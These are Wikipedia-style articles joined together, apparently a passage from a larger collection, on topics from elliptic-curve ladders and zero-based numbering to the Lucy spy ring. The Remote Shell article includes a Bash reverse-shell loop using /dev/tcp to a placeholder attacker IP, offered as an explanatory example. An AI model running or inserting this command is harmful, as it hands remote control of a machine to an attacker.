Since the inception of the standard Montgomery curve Curve25519 at the 128-bit security level, there have been various software implementations to compute the ECDH on various architectures, and to achieve the best possible performance cryptographic developers have resorted to writing the implementations in the assembly language of the underlying architecture. The work[12] provided a couple of 64-bit assembly implementations targeting the AMD64 architecture. The implementations were developed using a tool known as qhasm,[13] which can generate high-speed assembly-language cryptographic programs. It is to be noted that the function CSwap was used in the implementations of these ladders. Since then there have been several attempts to optimise the ladder implementation through hand-written assembly programs, of which the notion of CSelect was first used in[14] and then in.[15] Apart from using sequential instructions, vector instructions have also been used to optimise the ladder computation in various works.[16][17][18][19] Along with AMD64, attempts have also been made to achieve efficient implementations on other architectures like ARM. The works[20] and[21] provide efficient implementations targeting the ARM architecture. The libraries lib25519[22] and[23] are two state-of-the-art libraries containing efficient implementations of the Montgomery ladder for Curve25519. Nevertheless, the libraries contain implementations of other cryptographic primitives as well.
Apart from Curve25519, there have been several attempts to compute the ladder over other curves at various security levels. Efficient implementations of the ladder over the standard curve Curve448 at the 224-bit security level have also been studied in the literature.[14][17][19] A curve named Curve41417, providing security just over 200 bits, was proposed,[24] in which a variant of the Karatsuba strategy was used to implement the field multiplication needed for the related ECC software. In pursuit of Montgomery curves that are competitive with Curve25519 and Curve448, research has been done and a couple of curves were proposed, along with efficient sequential[15] and vectorised[19] implementations of the corresponding ladders. At the 256-bit security level, efficient implementations of the ladder have also been addressed through three different Montgomery curves.[25]
|
https://en.wikipedia.org/wiki/Elliptic_curve_point_multiplication
|
In computer programming, a wild branch is a GOTO instruction where the target address is indeterminate, random or otherwise unintended.[1] It is usually the result of a software bug causing the accidental corruption of a pointer or array index. It is "wild" in the sense that it cannot be predicted to behave consistently. In other words, a wild branch is a branch through a function pointer that is wild (dangling).
Detection of wild branches is frequently difficult; they are normally identified by erroneous results (where the unintended target address is nevertheless a valid instruction, enabling the program to continue despite the error) or a hardware interrupt, which may change depending upon register contents. Debuggers and monitor programs such as instruction set simulators can sometimes be used to determine the location of the original wild branch.
|
https://en.wikipedia.org/wiki/Wild_branch
|
The remote shell (rsh) is a command-line computer program that can execute shell commands as another user, and on another computer across a computer network.
The remote system to which rsh connects runs the rsh daemon (rshd). The daemon typically uses the well-known Transmission Control Protocol (TCP) port number 513.
Rsh originated as part of the BSD Unix operating system, along with rcp, as part of the rlogin package on 4.2BSD in 1983. rsh has since been ported to other operating systems.
The rsh command has the same name as another common UNIX utility, the restricted shell, which first appeared in PWB/UNIX; in System V Release 4, the restricted shell is often located at /usr/bin/rsh.
Like the other Berkeley r-commands that involve user authentication, the rsh protocol is not secure for network use, because it sends unencrypted information over the network, among other reasons. Some implementations also authenticate by sending unencrypted passwords over the network. rsh has largely been replaced with the secure shell (ssh) program, even on local networks.[1][2]
As an example of rsh use, the following executes the command mkdir testdir as user remoteuser on the computer host.example.com running a UNIX-like system:
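A sketch of such an invocation (flags can vary between rsh implementations; `-l` selects the remote user in BSD-derived versions, and this assumes rshd is configured on the remote host):

```shell
rsh -l remoteuser host.example.com "mkdir testdir"
```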
After the command has finished, rsh terminates. If no command is specified, then rsh will log in on the remote system using rlogin. The network location of the remote computer is looked up using the Domain Name System.
On Debian-based systems, a command such as apt can be used to install an rsh client.
A remote shell session can be initiated by either a local device (which sends commands) or a remote device (on which commands are executed).[3] In the first case the remote shell is called a bind shell; in the second case, a reverse shell.[4]
A reverse shell can be used when the device on which the command is to be executed is not directly accessible, for example for remote maintenance of computers located behind NAT that cannot be accessed from the outside. Some exploits create a reverse shell from an attacked device back to machines controlled by the attackers (called a "reverse shell attack"). The following code demonstrates a reverse shell attack:[5]
It opens a TCP socket to the attacker's IP address at port 80 as a file descriptor. It then repeatedly reads lines from the socket and runs each line, piping both stdout and stderr back to the socket. In other words, it gives the attacker a remote shell on the machine.
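The snippet being described above matches, in shape, the classic Bash construct below (a hedged reconstruction for illustration; `attacker_ip` is a placeholder, and /dev/tcp is a Bash feature, not a real device file):

```shell
exec 5<>/dev/tcp/attacker_ip/80   # open a TCP socket to the attacker as fd 5
while read -r line 0<&5; do       # read each command line from the socket
    $line >&5 2>&5                # run it, sending stdout and stderr back
done
```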
|
https://en.wikipedia.org/wiki/Remote_Shell
|
Adaptive partition schedulers are a relatively new type of partition scheduler, which in turn is a kind of scheduling algorithm, pioneered with the most recent version of the QNX operating system. Adaptive partitioning, or AP, allows the real-time system designer to request that a percentage of processing resources be reserved for a particular partition (a group of threads and/or processes making up a subsystem). The operating system's priority-driven pre-emptive scheduler will behave in the same way that a non-AP system would until the system is overloaded (i.e. system-wide there is more computation to perform than the processor is capable of sustaining over the long term). During overload, the AP scheduler enforces hard limits on total run-time for the subsystems within a partition, as dictated by the allocated percentage of processor bandwidth for the particular partition.
If the system is not overloaded, a partition that is allocated (for example) 10% of the processor bandwidth can, in fact, use more than 10%, as it will borrow from the spare budget of other partitions (but will be required to pay it back later). This is very useful for non-real-time subsystems that experience variable load, since these subsystems can make use of spare budget from hard real-time partitions in order to make more forward progress than they would in a fixed partition scheduler such as ARINC-653, but without impacting the hard real-time subsystems' deadlines.
QNX Neutrino 6.3.2 and newer versions have this feature.
|
https://en.wikipedia.org/wiki/Adaptive_partition_scheduler
|
Zero-based numbering is a way of numbering in which the initial element of a sequence is assigned the index 0, rather than the index 1 as is typical in everyday non-mathematical or non-programming circumstances. Under zero-based numbering, the initial element is sometimes termed the zeroth element,[1] rather than the first element; zeroth is a coined ordinal number corresponding to the number zero. In some cases, an object or value that does not (originally) belong to a given sequence, but which could be naturally placed before its initial element, may be termed the zeroth element. There is no wide agreement regarding the correctness of using zero as an ordinal (nor regarding the use of the term zeroth), as it creates ambiguity for all subsequent elements of the sequence when lacking context.
Numbering sequences starting at 0 is quite common in mathematics notation, in particular in combinatorics, though programming languages for mathematics usually index from 1.[2][3][4] In computer science, array indices usually start at 0 in modern programming languages, so computer programmers might use zeroth in situations where others might use first, and so forth. In some mathematical contexts, zero-based numbering can be used without confusion, when ordinal forms have a well-established meaning with an obvious candidate to come before first; for instance, a zeroth derivative of a function is the function itself, obtained by differentiating zero times. Such usage corresponds to naming an element not properly belonging to the sequence but preceding it: the zeroth derivative is not really a derivative at all. However, just as the first derivative precedes the second derivative, so also does the zeroth derivative (or the original function itself) precede the first derivative.
Martin Richards, creator of the BCPL language (a precursor of C), designed arrays indexed from 0 as the natural position to start accessing the array contents in the language, since the value of a pointer p used as an address accesses the position p + 0 in memory.[5][6] BCPL was first compiled for the IBM 7094; the language introduced no run-time indirection lookups, so the indirection optimization provided by these arrays was done at compile time.[6] The optimization was nevertheless important.[6][7]
In 1982 Edsger W. Dijkstra, in his pertinent note Why numbering should start at zero,[8] argued that array subscripts should start at zero, the latter being the most natural number. Discussing possible designs of array ranges by enclosing them in a chained inequality, combining sharp and standard inequalities into four possibilities, he demonstrated that, to his conviction, zero-based arrays are best represented by non-overlapping index ranges which start at zero, alluding to open, half-open and closed intervals as with the real numbers. Dijkstra's criteria for preferring this convention are, in detail, that it represents empty sequences in a more natural way (a ≤ i < a?) than closed "intervals" (a ≤ i ≤ (a − 1)?), and that with half-open "intervals" of naturals, the length of a sub-sequence equals the upper minus the lower bound (a ≤ i < b gives (b − a) possible values for i, with a, b, i all integers).
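Dijkstra's half-open convention is visible directly in, for example, Python's built-in range, where range(a, b) covers a ≤ i < b:

```python
a, b = 3, 7
r = list(range(a, b))            # half-open interval [a, b): 3, 4, 5, 6
assert len(r) == b - a           # length = upper bound minus lower bound
assert list(range(a, a)) == []   # the empty sequence a <= i < a, naturally
```

Two adjacent half-open ranges [a, b) and [b, c) also concatenate without overlap or gap, which is the other property Dijkstra valued.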
This usage follows from design choices embedded in many influentialprogramming languages, includingC,Java, andLisp. In these three, sequence types (C arrays, Java arrays and lists, and Lisp lists and vectors) are indexed beginning with the zero subscript. Particularly in C, where arrays are closely tied topointerarithmetic, this makes for a simpler implementation: the subscript refers to an offset from the starting position of an array, so the first element has an offset of zero.
Referencing memory by an address and an offset is represented directly incomputer hardwareon virtually all computer architectures, so this design detail in C makes compilation easier, at the cost of some human factors. In this context using "zeroth" as an ordinal is not strictly correct, but a widespread habit in this profession. Other programming languages, such asFortranorCOBOL, have array subscripts starting with one, because they were meant ashigh-level programming languages, and as such they had to have a correspondence to the usualordinal numberswhich predate theinvention of the zeroby a long time.
Pascalallows the range of an array to be of any ordinal type (including enumerated types).APLallows setting the index origin to 0 or 1 during runtime programmatically.[9][10]Some recent languages, such asLuaandVisual Basic, have adopted the same convention for the same reason.
Zero is the lowest unsigned integer value, one of the most fundamental types in programming and hardware design. In computer science,zerois thus often used as the base case for many kinds of numericalrecursion. Proofs and other sorts of mathematical reasoning in computer science often begin with zero. For these reasons, in computer science it is not unusual to number from zero rather than one.
If an array is used to represent a cycle, it is convenient to obtain the index with amodulo function, which can result in zero.
With zero-based numbering, a range can be expressed as the half-openinterval,[0,n), as opposed to the closed interval,[1,n]. Empty ranges, which often occur in algorithms, are tricky to express with a closed interval without resorting to obtuse conventions like[1, 0]. Because of this property, zero-based indexing potentially reducesoff-by-oneandfencepost errors.[8]On the other hand, the repeat countnis calculated in advance, making the use of counting from 0 ton− 1(inclusive) less intuitive. Some authors prefer one-based indexing, as it corresponds more closely to how entities are indexed in other contexts.[11]
Another property of this convention is in the use of modular arithmetic as implemented in modern computers. Usually, the modulo function maps any integer modulo N to one of the numbers 0, 1, 2, ..., N − 1, where N ≥ 1. Because of this, many formulas in algorithms (such as that for calculating hash table indices) can be elegantly expressed in code using the modulo operation when array indices start at zero.
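Both the cyclic-array and the hash-table cases reduce to the same idiom, sketched below (table size and functions are hypothetical, for illustration only):

```python
# With zero-based indices, the result of the modulo operation is
# itself a valid index 0 .. N-1; no +1/-1 correction is required.
N = 8  # table size (hypothetical)

def slot(key_hash: int) -> int:
    # Hash-table slot: any integer hash maps directly to an index.
    return key_hash % N

def successor(i: int) -> int:
    # Next position in a cyclic (ring-buffer) traversal of the array.
    return (i + 1) % N

assert slot(8) == 0           # wraps around to the first slot
assert slot(-1) == 7          # Python's % always yields 0 .. N-1
assert successor(N - 1) == 0  # the cycle closes back at index 0
```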
Pointer operations can also be expressed more elegantly with a zero-based index, due to the underlying address/offset logic mentioned above. To illustrate, suppose a is the memory address of the first element of an array, and i is the index of the desired element. To compute the address of the desired element, if the index numbers count from 1, the desired address is computed by this expression:

a + s × (i − 1)
where s is the size of each element. In contrast, if the index numbers count from 0, the expression becomes:

a + s × i
This simpler expression is more efficient to compute at run time.
However, a language wishing to index arrays from 1 could adopt the convention that every array address is represented by a′ = a − s; that is, rather than using the address of the first array element, such a language would use the address of a fictitious element located immediately before the first actual element. The indexing expression for a 1-based index would then be:

a′ + s × i
Hence, the efficiency benefit at run time of zero-based indexing is not inherent, but is an artifact of the decision to represent an array with the address of its first element rather than the address of the fictitious zeroth element. However, the address of that fictitious element could very well be the address of some other item in memory not related to the array.
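The three addressing conventions discussed above can be compared side by side (base address and element size are hypothetical values chosen for illustration):

```python
# Address of element i under the conventions discussed above, for an
# array at (hypothetical) base address a with element size s bytes.
a = 0x1000
s = 4

def addr_one_based(i):
    # 1-based indexing: a per-access subtraction is needed.
    return a + s * (i - 1)

def addr_zero_based(i):
    # 0-based indexing: the offset is simply s * i.
    return a + s * i

# The "fictitious element" trick: bias the base address once, so that
# 1-based indexing also needs no per-access subtraction.
a_prime = a - s

def addr_one_based_biased(i):
    return a_prime + s * i

# All three conventions locate the same cells:
assert addr_one_based(1) == addr_zero_based(0) == a
assert addr_one_based(3) == addr_zero_based(2) == addr_one_based_biased(3)
```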
Superficially, the fictitious element does not scale well to multidimensional arrays. Indexing multidimensional arrays from zero makes a naive (contiguous) conversion to a linear address space (systematically varying one index after the other) look simpler than indexing from one. For instance, when mapping the three-dimensional array A[P][N][M] to a linear array L[M ⋅ N ⋅ P], both with M ⋅ N ⋅ P elements, the index r in the linear array that accesses a specific element with L[r] = A[z][y][x] in zero-based indexing, i.e. 0 ≤ x < P, 0 ≤ y < N, 0 ≤ z < M, and 0 ≤ r < M ⋅ N ⋅ P, is calculated by

r = x + P ⋅ (y + N ⋅ z)
Organizing all arrays with 1-based indices (1 ≤ x′ ≤ P, 1 ≤ y′ ≤ N, 1 ≤ z′ ≤ M, 1 ≤ r′ ≤ M ⋅ N ⋅ P), and assuming an analogous arrangement of the elements, gives

r′ = x′ + P ⋅ (y′ − 1 + N ⋅ (z′ − 1))
to access the same element, which arguably looks more complicated. Of course, r′ = r + 1, since z = z′ − 1, y = y′ − 1, and x = x′ − 1. A simple everyday example is positional notation, which the invention of the zero made possible. In positional notation, tens, hundreds, thousands and all other digit positions start with zero; only the units start at one.[12]
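The zero-based linearization under the bounds stated above, and its 1-based counterpart, can be checked directly (a sketch with arbitrary dimensions; the linear formula r = x + P ⋅ (y + N ⋅ z) is the standard row-varying-fastest layout consistent with those bounds):

```python
# Linear index for L[r] = A[z][y][x] with the stated bounds:
# 0 <= x < P, 0 <= y < N, 0 <= z < M.
P, N, M = 4, 3, 2

def r_zero_based(x, y, z):
    return x + P * (y + N * z)

# The 1-based version (1 <= x' <= P, etc.) must subtract 1 from every
# index before multiplying, then add 1 to the result:
def r_one_based(x1, y1, z1):
    return (x1 - 1) + P * ((y1 - 1) + N * (z1 - 1)) + 1

# r' = r + 1 for corresponding indices, as the text notes:
for z in range(M):
    for y in range(N):
        for x in range(P):
            assert r_one_based(x + 1, y + 1, z + 1) == r_zero_based(x, y, z) + 1
```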
This situation can lead to some confusion in terminology. In a zero-based indexing scheme, the first element is "element number zero"; likewise, the twelfth element is "element number eleven". This creates a mismatch between ordinal names and the quantity of objects numbered: the highest index of n objects is n − 1, yet it refers to the nth element. For this reason, the first element is sometimes referred to as the zeroth element, in an attempt to avoid confusion.
In mathematics, many sequences of numbers or of polynomials are indexed by nonnegative integers, for example, the Bernoulli numbers and the Bell numbers.
In both mechanics and statistics, the zeroth moment is defined, representing total mass in the case of physical density, or total probability, i.e. one, for a probability distribution.
The zeroth law of thermodynamics was formulated after the first, second, and third laws, but was considered more fundamental, hence its name.
In biology, an organism is said to have zero-order intentionality if it shows "no intention of anything at all". This includes a situation where the organism's genetically predetermined phenotype results in a fitness benefit to itself, because it did not "intend" to express its genes.[13] In a similar sense, a computer may be considered from this perspective a zero-order intentional entity, as it does not "intend" to execute the code of the programs it runs.[14]
In biological or medical experiments, the first day of an experiment is often numbered as day 0.[15]
Patient zero (or index case) is the initial patient in the population sample of an epidemiological investigation.
The year zero does not exist in the widely used Gregorian calendar or in its predecessor, the Julian calendar. Under those systems, the year 1 BC is followed by AD 1. However, there is a year zero in astronomical year numbering (where it coincides with the Julian year 1 BC) and in ISO 8601:2004 (where it coincides with the Gregorian year 1 BC), as well as in all Buddhist and Hindu calendars.
In many countries, the ground floor in buildings is considered floor number 0 rather than the "1st floor", the naming convention usually found in the United States. This makes a consistent set with underground floors marked with negative numbers.
While the ordinal 0 mostly finds use in communities directly connected to mathematics, physics, and computer science, there are also instances in classical music. The composer Anton Bruckner regarded his early Symphony in D minor as unworthy of inclusion in the canon of his works, and he wrote gilt nicht ("doesn't count") on the score along with a circle with a crossbar, intending it to mean "invalid". But posthumously, this work came to be known as Symphony No. 0 in D minor, even though it was actually written after Symphony No. 1 in C minor. There is an even earlier Symphony in F minor of Bruckner's, which is sometimes called No. 00. The Russian composer Alfred Schnittke also wrote a Symphony No. 0.
In some universities, including Oxford and Cambridge, "week 0" or occasionally "noughth week" refers to the week before the first week of lectures in a term. In Australia, some universities refer to this as "O week", which serves as a pun on "orientation week". As a parallel, the introductory weeks at university educations in Sweden are generally called nollning (zeroing).
The United States Air Force starts basic training each Wednesday, and the first week (of eight) is considered to begin with the following Sunday. The four days before that Sunday are often referred to as "zero week".
24-hour clocks and the international standard ISO 8601 use 0 to denote the first (zeroth) hour of the day, consistent with using 0 to denote the first (zeroth) minute of the hour and the first (zeroth) second of the minute. Also, the 12-hour clocks used in Japan use 0 to denote the hour immediately after midnight and noon, in contrast to the 12 used elsewhere, in order to avoid confusion over whether 12 a.m. and 12 p.m. represent noon or midnight.
Robert Crumb's drawings for the first issue of Zap Comix were stolen, so he drew a whole new issue, which was published as issue 1. Later he re-inked his photocopies of the stolen artwork and published it as issue 0.
The Brussels ring road in Belgium is numbered R0. It was built after the ring road around Antwerp, but Brussels (being the capital city) was deemed deserving of a more basic number. Similarly, the (unfinished) orbital motorway around Budapest in Hungary is called M0.
Zero is sometimes used in street addresses, especially in schemes where even numbers are on one side of the street and odd numbers on the other. A case in point is Christ Church on Harvard Square, whose address is 0 Garden Street.
Formerly in Formula One, when a defending world champion did not compete in the following season, the number 1 was not assigned to any driver; instead, one driver of the world champion's team would carry the number 0, and the other number 2. This happened in both 1993 and 1994, with Damon Hill carrying the number 0 in both seasons, as defending champion Nigel Mansell quit after 1992 and defending champion Alain Prost quit after 1993. However, in 2014 the series moved to drivers carrying career-long personalised numbers, instead of team-allocated numbers, other than the defending champion still having the option to carry number 1. Therefore, 0 is no longer used in this scenario. It is not clear whether it is available as a driver's chosen number or whether numbers must be between 2 and 99, but it has not been used to date under this system.
Some team sports allow 0 to be chosen as a player's uniform number (in addition to the typical range of 1–99). The NFL voted to allow this from 2023 onwards.
A chronological prequel of a series may be numbered as 0, such as Ring 0: Birthday or Zork Zero.
The Swiss Federal Railways number certain classes of rolling stock from zero, for example, Re 460 000 to 118.
In the realm of fiction, Isaac Asimov eventually added a Zeroth Law to his Three Laws of Robotics, essentially making them four laws.
A standard roulette wheel contains the number 0 as well as 1–36. It appears in green, so it is classed as neither a "red" nor a "black" number for betting purposes. The card game Uno has number cards running from 0 to 9 along with special cards, within each coloured suit.
The Four Essential Freedoms of Free Software are numbered starting from zero. This is for historical reasons: the list originally had only three freedoms, and when the fourth was added it was placed in the zeroth position as it was considered more basic.
https://en.wikipedia.org/wiki/Zero-based_numbering
Ariadne's thread, named for the legend of Ariadne, is a method of solving a problem that has multiple apparent ways to proceed—such as a physical maze, a logic puzzle, or an ethical dilemma—through an exhaustive application of logic to all available routes. Its defining feature is a contingent, ordered search that traces each step and each found truth, point by point, until an end position is reached. This record-keeping can take the form of a mental note, a physical marking, or even a philosophical debate; it is the process itself that assumes the name.
The key element in applying Ariadne's thread to a problem is the creation and maintenance of a record—physical or otherwise—of the problem's available and exhausted options at all times. This record is referred to as the "thread", regardless of its actual medium. The purpose the record serves is to permit backtracking—that is, reversing earlier decisions and trying alternatives. Given the record, applying the algorithm is straightforward: at each decision point, try an option not yet marked, record it, and if every option at that point is exhausted, mark the point as a failure and backtrack to the previous decision.
This algorithm will terminate upon either finding a solution or marking all initial choices as failures; in the latter case, there is no solution. If a thorough examination is desired even though a solution has been found, one can revert to the previous decision, mark the success, and continue on as if a solution were never found; the algorithm will exhaust all decisions and find all solutions.
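The record-and-backtrack procedure described above can be sketched in a few lines of Python; the maze, its node names, and the `solve` helper are hypothetical, chosen only to illustrate the thread:

```python
# A minimal sketch of Ariadne's thread: keep a record ("thread") of
# the choices made so far, mark failures, and backtrack exhaustively.
# The maze here is hypothetical; nodes map to lists of onward choices.
maze = {
    "entrance": ["A", "B"],
    "A": ["dead end"],
    "B": ["C", "dead end"],
    "C": ["exit"],
}

def solve(node, thread):
    if node == "exit":
        return list(thread)            # a solution: the thread so far
    for choice in maze.get(node, []):  # untried options at this point
        thread.append(choice)          # extend the record
        found = solve(choice, thread)
        if found is not None:
            return found
        thread.pop()                   # mark as failure and backtrack
    return None                        # all options here are exhausted

assert solve("entrance", []) == ["B", "C", "exit"]
```

Returning `None` when every initial choice is exhausted corresponds to the "no solution" case noted above; removing the early `return found` would instead enumerate every solution.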
The terms "Ariadne's thread" and "trial and error" are often used interchangeably, which is not necessarily correct. They have two distinctive differences:
In short, trial and error approaches a desired solution; Ariadne's thread blindly exhausts the search space completely, finding any and all solutions. Each has its own appropriate uses. They can be employed in tandem—for example, although the editing of a Wikipedia article is arguably a trial-and-error process (given how in theory it approaches an ideal state), article histories provide the record to which Ariadne's thread may be applied, reverting detrimental edits and restoring the article to the most recent error-free version, from which other options may be attempted.
Obviously, Ariadne's thread may be applied to the solving of mazes in the same manner as the legend; an actual thread can be used as the record, or chalk or a similar marker can be applied to label passages. If the maze is on paper, the thread may well be a pencil.
Logic problems of all natures may be resolved via Ariadne's thread, the maze being but an example. At present, it is most prominently applied to Sudoku puzzles, used to attempt values for as-yet-unsolved cells. The medium of the thread for puzzle-solving can vary widely, from a pencil to numbered chits to a computer program, but all accomplish the same task. Note that as the compilation of Ariadne's thread is an inductive process, and due to its exhaustiveness leaves no room for actual study, it is largely frowned upon as a solving method, to be employed only as a last resort when deductive methods fail.
Artificial intelligence is heavily dependent upon Ariadne's thread when it comes to game-playing, most notably in programs which play chess; the possible moves are the decisions, game-winning states the solutions, and game-losing states the failures. Due to the massive depth of many games, most algorithms cannot afford to apply Ariadne's thread entirely on every move due to time constraints, and therefore work in tandem with a heuristic that evaluates game states and limits a breadth-first search only to those that are most likely to be beneficial, a trial-and-error process.
Even circumstances where the concept of "solution" is not so well defined have had Ariadne's thread applied to them, such as navigating the World Wide Web, making sense of patent law, and in philosophy; "Ariadne's Thread" is a popular name for websites of many purposes, but primarily for those that feature philosophical or ethical debate.
https://en.wikipedia.org/wiki/Ariadne%27s_thread_(logic)
In mathematics, more specifically differential topology, a local diffeomorphism is intuitively a map between smooth manifolds that preserves the local differentiable structure. The formal definition of a local diffeomorphism is given below.
Let X and Y be differentiable manifolds. A function f : X → Y is a local diffeomorphism if, for each point x ∈ X, there exists an open set U containing x such that the image f(U) is open in Y and f|U : U → f(U) is a diffeomorphism.
A local diffeomorphism is a special case of an immersion f : X → Y. In this case, for each x ∈ X, there exists an open set U containing x such that the image f(U) is an embedded submanifold, and f|U : U → f(U) is a diffeomorphism. Here X and f(U) have the same dimension, which may be less than the dimension of Y.[1]
A map is a local diffeomorphism if and only if it is a smooth immersion (smooth local embedding) and an open map.
The inverse function theorem implies that a smooth map f : X → Y is a local diffeomorphism if and only if the derivative Df_x : T_x X → T_f(x) Y is a linear isomorphism for all points x ∈ X. This implies that X and Y have the same dimension.[2]
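As a concrete illustration of this derivative criterion (an example added here for clarity, not taken from the original article):

```latex
% The cube map f : \mathbb{R} \to \mathbb{R}, \; f(x) = x^3, is a smooth
% bijection but NOT a local diffeomorphism: its derivative
\[
  Df_x = 3x^2
\]
% is a linear isomorphism of \mathbb{R} exactly when x \neq 0, and it
% vanishes at x = 0; indeed the inverse x \mapsto x^{1/3} fails to be
% differentiable at 0. By contrast, for \exp : \mathbb{R} \to \mathbb{R},
\[
  D\exp_x = e^x \neq 0 \quad \text{for all } x,
\]
% so \exp is a local diffeomorphism onto its image (0, \infty).
```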
It follows that a map f : X → Y between two manifolds of equal dimension (dim X = dim Y) is a local diffeomorphism if and only if it is a smooth immersion (smooth local embedding), or equivalently, if and only if it is a smooth submersion. This is because, for any x ∈ X, both T_x X and T_f(x) Y have the same dimension, thus Df_x is a linear isomorphism if and only if it is injective, or equivalently, if and only if it is surjective.[3]
Here is an alternative argument for the case of an immersion: every smooth immersion is a locally injective function, while invariance of domain guarantees that any continuous injective function between manifolds of equal dimension is necessarily an open map.
All manifolds of the same dimension are "locally diffeomorphic" in the following sense: if X and Y have the same dimension, and x ∈ X and y ∈ Y, then there exist open neighbourhoods U of x and V of y and a diffeomorphism f : U → V. However, this map f need not extend to a smooth map defined on all of X, let alone extend to a local diffeomorphism. Thus the existence of a local diffeomorphism f : X → Y is a stronger condition than "being locally diffeomorphic". Indeed, although locally-defined diffeomorphisms preserve differentiable structure locally, one must be able to "patch up" these (local) diffeomorphisms to ensure that the domain is the entire smooth manifold.
For example, one can impose two different differentiable structures on ℝ⁴ that each make ℝ⁴ into a differentiable manifold, but both structures are not locally diffeomorphic (see Exotic ℝ⁴).
As another example, there can be no local diffeomorphism from the 2-sphere to Euclidean 2-space, although they do indeed have the same local differentiable structure. This is because a local diffeomorphism is both continuous and open, so the image of the compact 2-sphere would be a compact (hence closed) and open nonempty subset of Euclidean 2-space; by connectedness, that image would have to be all of Euclidean 2-space, which is not compact.
If a local diffeomorphism between two manifolds exists then their dimensions must be equal.
Every local diffeomorphism is also a local homeomorphism and therefore a locally injective open map.
A local diffeomorphism has constant rank n.
https://en.wikipedia.org/wiki/Local_diffeomorphism
Opportunity-Driven Multiple Access (ODMA) is a UMTS communications relaying protocol standard first introduced by the European Telecommunications Standards Institute (ETSI) in 1996. ODMA has been adopted by the 3rd Generation Partnership Project (3GPP) to improve the efficiency of UMTS networks using the TDD mode. One of the objectives of ODMA is to enhance the capacity and coverage of radio transmissions towards the boundaries of the cell. While mobile stations under the cell coverage area can communicate directly with the base station, mobile stations outside the cell boundary can still access the network and communicate with the base station via multihop transmission. Mobile stations with high data rates inside the cell are used as multihop relays.
The initial concept of Opportunity Driven Multiple Access (ODMA) was conceived and patented in South Africa by David Larsen and James Larsen of SRD Pty Ltd in 1978.[1]
The ODMA standard was shelved by the 3GPP committee in 1999 due to complexity issues. The technology continues to be developed and enhanced by IWICS, which holds the key patents describing the methods employed in ODMA to effect opportunity-driven communications.
With the explosion of cellular phone use and Internet multimedia services, wireless networks are becoming increasingly congested. The increased demand has raised expectations while creating capacity problems and a need for greater bandwidth. One potential solution is to significantly reduce the transmitted power of wireless units, which implies improving the signal-to-noise ratio; that ratio is affected by numerous parameters, including radio frequency and path. Opportunity Driven Multiple Access (ODMA) continually determines optimal points along that path to support each transmission.
Adaptation
ODMA uses many adaptation techniques to optimize communications, but one of the most powerful is path diversity. From origin to destination, ODMA stations relay the transmissions in an intelligent and efficient manner.
The available optimal paths will increase as subscribers join the network, supporting a fundamental aspect of the ODMA philosophy: communications are dynamic and local, best controlled at the station level rather than from some centralized source. Each ODMA-network station is an intelligent burst-mode radio, which can use all the available bandwidth some of the time. However, as with any technology, weather or general network conditions can affect transmissions.
Like cellular networks, the ODMA-network stations operate in the same wide frequency band, but frequency hopping, at lower data rates, introduces sub-bands. Because transmission is packet based and connectionless, stations relay packets from neighbor stations. For each packet, a station optimizes the transmission by adapting the route, power, data rate, packet length, frequency, time window and data quality over a wide range. Each station has responsibility and much autonomy for routing and service-enhancing adaptation to the current environment. For security, stations accept the authority of a network supervisor.
https://en.wikipedia.org/wiki/Opportunity-Driven_Multiple_Access
The Lucy spy ring (German: Lucy-Spionagering) was an anti-Nazi World War II espionage operation headquartered in Switzerland and run by Rudolf Roessler, a German refugee. Its story was only published in 1966, and very little is clear about the ring, Roessler, or the effort's sources or motives.
At the outbreak of World War II, Roessler was a political refugee from Bavaria who had fled to Switzerland when Hitler came to power. He was the founder of a small publishing firm, Vita Nova Verlag, producing copies of anti-Nazi Exilliteratur and other literary works in the German language strictly banned under censorship in Nazi Germany, for smuggling across the border and black-market distribution to dissident intellectuals. He was employed by Brigadier Masson, head of Swiss Military Intelligence, as an analyst with Bureau Ha, overtly a press-cuttings agency but in fact a covert department of Swiss intelligence. Roessler was approached by two German officers, Fritz Thiele and Rudolph von Gersdorff, who were part of a German resistance conspiracy to overthrow Hitler and had been known to Roessler in the 1930s through the Herrenklub.
Thiele and Gersdorff wished him to act as a conduit for high-level military information, to be made available to him to make use of in the fight against Nazism. This they accomplished by equipping Roessler with a radio and an Enigma machine, and designating him as a German military station (call-signed RAHS). In this way they could openly transmit their information to him through normal channels. They were able to do this as Thiele and his superior, Erich Fellgiebel (who was also part of the conspiracy), were in charge of the German Defence Ministry's communication centre, the Bendlerblock. This was possible because those employed to encode the information were unaware of where it was going, while those transmitting the messages had no idea what was in them.
At first Roessler passed the information to Swiss military intelligence, via a friend who was serving in Bureau Ha, an intelligence agency used by the Swiss as a cut-out. Roger Masson, the head of Swiss military intelligence, also chose to pass some of this information to the British SIS. Later, seeking to aid the USSR in its fight against Nazism, Roessler was able to pass on information via another contact who was part of a Soviet (GRU) network run by Alexander Rado. Roessler was not a Communist, nor even a Communist sympathizer until much later, and wished to remain at arm's length from Rado's network, insisting on complete anonymity and communicating with Rado only through the courier, Christian Schneider. Rado agreed to this, recognizing the value of the information being received. Rado code-named the source "Lucy", simply because all he knew about the source was that it was in Lucerne.
Roessler's first major contribution to Soviet intelligence came in May 1941, when he was able to deliver details of Operation Barbarossa, Germany's impending invasion of the Soviet Union. Though his warning was initially ignored, as Soviet intelligence had received multiple false alarms about an impending German invasion, Roessler's dates eventually proved accurate. Following the invasion, in June 1941, Lucy was regarded as a VYRDO source, i.e. of the highest importance, to be transmitted immediately. Over the next two years "Lucy" was able to supply the Soviets with high-grade military intelligence. During the autumn of 1942, "Lucy" provided the Soviets with detailed information about Case Blue, the German operations against Stalingrad and the Caucasus; during this period, decisions taken in Berlin were arriving in Moscow on average within ten hours, on one occasion in just six, not much longer than it took them to reach German front-line units. Roessler, and Rado's network, particularly Allan Foote, Rado's main radio operator, were prepared to work flat out to maintain the speed and flow of the information. At the peak of its operation, Rado's network was enciphering and sending several hundred messages per month, many of them from "Lucy". Meanwhile, Roessler alone had to do all the receiving, decoding and evaluating of the "Lucy" messages before passing them on; for him during this period it became a full-time operation. The culmination of "Lucy's" success came in the summer of 1943, in transmitting the details of Germany's plans for Operation Citadel, a planned summer offensive against the Kursk salient. The resulting Battle of Kursk became a strategic defeat for the German army and gave the Red Army the initiative on the eastern front for the remainder of the war.
During the winter of 1942, the Germans became aware of the transmissions from the Rado network and began to take steps against it through their counter-espionage bureau. After several attempts to penetrate the network, they succeeded in pressuring the Swiss to close it down in October 1943, when its radio transmitters were shut down and a number of key operatives were arrested. Thereafter Roessler's only outlet for the "Lucy" information was through Bureau Ha and Swiss Military Intelligence. Roessler was unaware that his information was also going to the Western Allies.
The Lucy spy ring came to an end in the summer of 1944 when the German members, who were also involved in other anti-Nazi activities, were arrested in the aftermath of the failed20 July plot.
In Switzerland the Lucy network consisted of the following members:
